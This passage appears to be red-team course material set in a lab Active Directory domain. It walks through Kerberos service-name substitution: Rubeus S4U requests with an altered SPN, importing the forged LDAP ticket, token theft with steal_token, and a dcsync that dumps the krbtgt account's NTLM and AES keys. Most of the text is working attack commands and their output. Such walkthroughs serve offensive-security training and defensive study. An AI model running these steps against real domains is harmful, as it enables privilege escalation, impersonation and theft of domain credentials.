The CIFS service can be leveraged for listing and transferring files, but what if port 445 was unavailable or we wanted an option for lateral movement?
In the Kerberos authentication protocol, a service validates an inbound ticket by ensuring that it's encrypted with that service's symmetric key. This key is derived from the password hash of the principal running the service. Most services run in the SYSTEM context of a computer account, e.g. SQL-2$. Therefore, all service tickets, whether they be for CIFS, TIME, or HOST, etc, will be encrypted with the same key. The SPN does not factor into ticket validation.
Furthermore, the SPN information in the ticket (i.e. the sname field) is not encrypted and can be changed arbitrarily. That means we can request a service ticket for a service, such as CIFS, but then modify the SPN to something different, such as LDAP, and the target service will accept it happily.
This was originally discovered by Alberto Solino and confirmed as "by design" by Microsoft.
We can be abuse this using /altservice flag in Rubeus. In this example, I'm using the same TGT for SQL-2 to request a TGS for LDAP instead of CIFS.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap
[*] Action: S4U
[*] Building S4U2self request for: 'SQL-2$@DEV.CYBERBOTIC.IO'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Sending S4U2self request to 10.10.122.10:88
[+] S4U2self success!
[*] Got a TGS for 'nlamb' to 'SQL-2$@DEV.CYBERBOTIC.IO'
[*] base64(ticket.kirbi):
doIFnD[...]FMLTIk
[*] Impersonating user 'nlamb' to target SPN 'cifs/dc-2.dev.cyberbotic.io'
[*] Final ticket will be for the alternate service 'ldap'
[*] Building S4U2proxy request for service: 'cifs/dc-2.dev.cyberbotic.io'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Sending S4U2proxy request to domain controller 10.10.122.10:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'ldap'
[*] base64(ticket.kirbi) for SPN 'ldap/dc-2.dev.cyberbotic.io':
doIGaD[...]ljLmlv
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv
[*] Using DEV\nlamb:FakePass
[*] Showing process : False
[*] Username : nlamb
[*] Domain : DEV
[*] Password : FakePass
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2580
[+] Ticket successfully imported!
[+] LUID : 0x4b328e
beacon> steal_token 2580
Against a domain controller, the LDAP service allows us to perform a dcsync.
beacon> dcsync dev.cyberbotic.io DEV\krbtgt
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 8/15/2022 4:01:04 PM
Object Security ID : S-1-5-21-569305411-121244042-2357301523-502
Object Relative ID : 502
Credentials:
Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d
ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d
lm - 0: 207d5e08551c51892309c0cf652c353b
* Primary:Kerberos-Newer-Keys *
Default Salt : DEV.CYBERBOTIC.IOkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
aes128_hmac (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
des_cbc_md5 (4096) : 629189372a372fda
